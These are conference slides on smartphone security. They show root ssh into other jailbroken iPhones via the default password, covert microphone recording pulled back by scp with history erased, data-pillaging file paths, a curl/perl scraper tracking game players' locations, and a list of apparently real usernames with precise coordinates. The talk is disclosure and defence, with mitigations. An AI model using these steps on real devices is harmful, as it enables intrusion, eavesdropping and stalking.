The New World of Smartphone Security
What Your iPhone Disclosed About You
Trevor Hawthorn, Managing Partner
Friday, July 9, 2010
Today’s Talk
“Pockets full of shells”
“I can see you from my house”
Who I am now
Old Smartphone Best Practices
= Bad
= Good
New Smartphone Best Practices
1. IT will use the iPhone Configuration Utility so you can talk to Exchange, use the VPN, wireless, etc.
2. Get iFart, it’s hilarious.
If AT&T is in attendance:
• Facts about AT&T and me:
• I enjoy my AT&T wireless service
• Feel that I have fantastic coverage everywhere I go at all times
• Am sure you have the largest/fastest 3G network, regardless of what VZW says
• Looking forward to years of receiving quality service from you
• Would love to chat
Jailbreaking
blackra1n
pwnagetool
It opens up a whole new world of applications
• common Unix binaries
• sshd
• tethering
• pirate software
• super easy to JB your phone
Impact on security
“Jail breaking removes 80% of the iPhone’s security precautions”
Charlie Miller, SyScan 2009
How many iPhones are jailbroken?
6.93% [1]
[1] http://www.slideshare.net/pinchmedia/piracy-on-the-appstore
Global Stats
ifconfig
root# ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
    inet 127.0.0.1 netmask 0xff000000
en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
    ether 00:21:e9:09:e3:4f
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
    inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
    inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
    ether 0a:0b:ad:0b:ab:e0
Interfaces
en0 = 802.11 interface
pdp_ip0 = primary cellular interface on APN: wap.cingular
pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail
pdp_ip2 = not sure
pdp_ip3 = used with tethering
ifconfig
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
    inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
sshd
So what?
Until (about) October 16, 2009, AT&T did not filter device-to-device IP network traffic.
AT&T’s Network
Most people think it looks like this: /32
Actually, more like this: Multiple /16’s
Your smartphone (and laptop/blackberry, etc.) has been on one giant flat network...
So I started looking around...
Devices On the Network
10,589* IPs scanned
Count Port What?
83244
3,644
22 sshd
80 http
2008 PDANet
62078 iPhone Default
Other stuff out there
• Saw a Linux box with sshd
• Windows Mobile devices
• Blackberries
• Windows PC’s
• PDANet for the iPhone is an open proxy.
ssh access between phones
Trevors-iPhone:~ root# ssh [email protected]
Password: [alpine]
Nates-iPhone:~ root#
Nates-iPhone:~ root# id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),20(staff),29(certusers),80(admin)
Filesystem Guide
Interesting stuff:
/private/var/mobile/Library/Mail - Email (IMAP, Exchange, POP3, etc.)
/private/var/mobile/Library/SMS - SMS Text Messages
/private/var/mobile/Library/Voicemail - Voicemail in .amr format
/private/var/mobile/Library/AddressBook - Contacts
/private/var/mobile/Library/CallHistory - Call History
/private/var/mobile/Library/Notes - Notes

/private/var/mobile/Library/CallHistory/call_history.db
/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
/private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb
/private/var/mobile/Library/Cookies/Cookies.plist
/private/var/mobile/Library/Keyboard/dynamic-text.dat
/private/var/mobile/Library/Mail/Accounts.plist
/private/var/mobile/Library/Mail/(mail account name)/Deleted Messages
/private/var/mobile/Library/Mail/(mail account name)/Sent Messages
/private/var/mobile/Library/Mail/(mail account name)/INBOX
/private/var/mobile/Library/Maps/History.plist
/private/var/mobile/Library/YouTube/Bookmarks.plist
/private/var/mobile/Library/Voicemail/(amr files)
/private/var/mobile/Library/Voicemail/voicemail.db
/private/var/mobile/Library/Safari/Bookmarks.plist
/private/var/mobile/Library/Safari/History.plist
/private/var/mobile/Library/Suspend.plist
/private/var/mobile/Library/Safari/SuspendState.plist
/private/var/mobile/Library/Safari/SMS/sms.db
/private/var/mobile/Library/Preference/(various preference Plists)
/private/var/mobile/Library/Notes/notes.db
Let’s do a bit more
Erica Utilities - cmd line utilities for the iPhone
recAudio: Record audio from the onboard microphone.
findme: Queries the iPhone’s GPS API to return latitude/longitude
[Diagram: Attacker and Victim phones, 10.69.62.100 and 10.69.62.220; recAudio is copied over scp/ssh and recording.aiff is copied back]
I can hear you typing
Trevors-iPhone:~ root# scp bin/recAudio [email protected]:
Password:
recAudio 100% 19KB 1.3KB/s 00:00
Trevors-iPhone:~ root# ssh [email protected]
Password:
Nates-iPhone:~ root# ./recAudio
Start talking. Press ^C to finish.
Starting recording
^C
Interrupted.
Stopping recording
Nates-iPhone:~ root# ls -l *.aiff
-rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92\ at\ 22:35:04.aiff
Nates-iPhone:~ root# mv 2009-10-92\ at\ 22:35:04.aiff test.aiff
Trevors-iPhone: root# scp [email protected]:~/*.aiff .
Password:
test.aiff 100% 523KB 2.2KB/s 00:00
Nates-iPhone:~ root# rm test.aiff recAudio .bash_history
Nates-iPhone:~ root# last
wtmp begins at Fri Oct 2 22:41
Nates-iPhone:~ root#
Other bad things
• ./openURL tel://1-900-XXX-XXX
• ./openURL tel://911 or tel://mynumber
• Pillage filesystem: email, sms, notes, app data, etc.
• apt-get install tcpdump nmap
• go wild on whatever network en0 is connected to.
Worms and Exploits
Dutch Extortion (November 2009)
ikee Worm (November 2009)
Exploits
• Phone/Privacy.A* command line tool
• Phone/iBotNet.A* worm with C&C
* Discovered by security firm Intego
Some good news
• AT&T does segment part of their network:
• e.g. I could not see friend in CA from DC
• But I could see friend in Boston
• No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)
• No way to correlate 10.x.x.x IP to person via Safari
• decloak.net doesn’t really work in Mobile Safari
• Man this is slow...
email to ID user
<img src="http://10.69.62.220/i.jpg">
[Diagram: the image request from 10.69.63.110 arrives at 10.69.63.220:80; src: 10.69.63.110, dst: 10.69.63.220]
What to do
• Don’t Jailbreak your phone if you care about security (sorry)
• Change root and mobile users’ passwords
• Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install
• IT Folks: Policy on jailbroken iPhones
• AT&T: Filter mobile to mobile IP traffic
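As a defender-side check for the "Do not bind sshd to pdp interfaces" item, here is an added example (not from the talk or from any Cydia package) that reads the ifconfig output shown earlier, lists the addresses exposed on the carrier's pdp_ip interfaces, and generates sshd_config ListenAddress lines for the non-cellular interfaces only. The sample ifconfig text is constructed from the slide, and the function names are assumptions of this example.

```shell
#!/bin/sh
# Constructed sample input: the ifconfig output shown earlier in the deck,
# trimmed to the lines that matter. pdp_ip* are the cellular (APN)
# interfaces, en0/en1 are 802.11, lo0 is loopback.
SAMPLE_IFCONFIG='lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
    inet 127.0.0.1 netmask 0xff000000
en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
    ether 00:21:e9:09:e3:4f
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
    inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
    inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
    ether 0a:0b:ad:0b:ab:e0'

# Read ifconfig output on stdin and print "<iface> <ipv4>" for every
# address on a pdp_ip* interface: a daemon bound there is reachable from
# other handsets on the carrier's flat 10.x network.
carrier_exposed_addresses() {
    awk '
        /^[a-z0-9_]+:/ { iface = $1; sub(/:$/, "", iface); next }
        $1 == "inet" && iface ~ /^pdp_ip/ { print iface " " $2 }
    '
}

# Read ifconfig output on stdin and emit sshd_config ListenAddress lines
# for the loopback and 802.11 addresses only, so sshd never binds to a
# cellular interface.
sshd_listen_lines() {
    awk '
        /^[a-z0-9_]+:/ { iface = $1; sub(/:$/, "", iface); next }
        $1 == "inet" && iface !~ /^pdp_ip/ { print "ListenAddress " $2 }
    '
}

# Stand-alone run against the constructed sample; a real check would pipe
# the live ifconfig output instead.
main() {
    echo "# exposed on the carrier network:"
    printf '%s\n' "$SAMPLE_IFCONFIG" | carrier_exposed_addresses
    echo "# sshd_config fragment:"
    printf '%s\n' "$SAMPLE_IFCONFIG" | sshd_listen_lines
}
main
```

Wi-Fi addresses change with every network the phone joins, so the ListenAddress lines have to be regenerated on each interface change; a packet filter that drops inbound TCP on the pdp_ip interfaces is the more durable form of the same rule.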
Privacy and Location Based Apps
Location Based Apps
• Underworld: Sweet Deal
• Drug trafficking game with candy
• Location matters, move product from point A to point B
• Phone sends high resolution coordinates to game server
Like Druglords
Underworld: Sweetdeal
Google Maps
Paros
• Client side proxy
• Configure the iPhone to use the IP address of the machine running Paros as its proxy
• Watch what your apps send and receive
Request
Response
Used to monitor players
Let’s pick a non-intel agency player
chezk
Request
Response
Lat/Lon to GMaps:
County Records
Ok neat, what else?
Near real-time geolocation tracking of players
cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots
curl script
#!/bin/sh
#
# First login...
#
curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -d @/home/trevor/iphone/login.xml --dump-header /home/trevor/iphone/headers.txt http://game.dl.a-steroids.com/TrafficServer/
#
# Then update location (replay the session cookie from the dumped headers)
#
curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/update_loc.xml http://game.dl.a-steroids.com/TrafficServer/
#
# Get GMap objects
#
curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/gmap_update.xml http://game.dl.a-steroids.com/TrafficServer/
perl script
#!/usr/bin/perl
use strict;
use warnings;

# make single or multiline input into one scalar
my $glob = join('', (<>));

# extract name-to-flag records (everything from <name> to the next </lon>)
my @records = $glob =~ /(<name>.*?<\/lon>)/ig;

for (@records) {
    my ($name, $lat, $lon) = $_ =~ qr|<name>(.*?)</name>.*?<lat>([\-\d\.]*)</lat><lon>([\-\d\.]*)</lon>|i;
    # skip records that carry a name but no coordinates
    next unless defined $lat && defined $lon;
    print "$lat,$lon,$name\n";
}
perl script output
39.93220206723633,-77.47186584472656,poppyseed
38.13753356933594,-77.06847380591797,Gadsden
39.98429718017578,-78.30014190673828,Ziggety
39.23520812988281,-77.40483581542969,Lexi
39.855418395996094,-77.2717056274414,Tatu
39.55705801582031,-77.4004086303711,Bigfoot
36.67790985107422,-77.5902328491211,Jeneko
38.297552490234375,-77.65829467773438,Stilbored
39.891050720214844,-77.55879211025781,Timoteo
39.66313247680664,-78.04374694824219,Gamber
36.295310314697266,-78.14061126700984,UnderWear
Comments/Feedback:
www.stratumsecurity.com
Twitter:
@packetwerks
@stratumsecurity
Special Thanks: Tiago Stock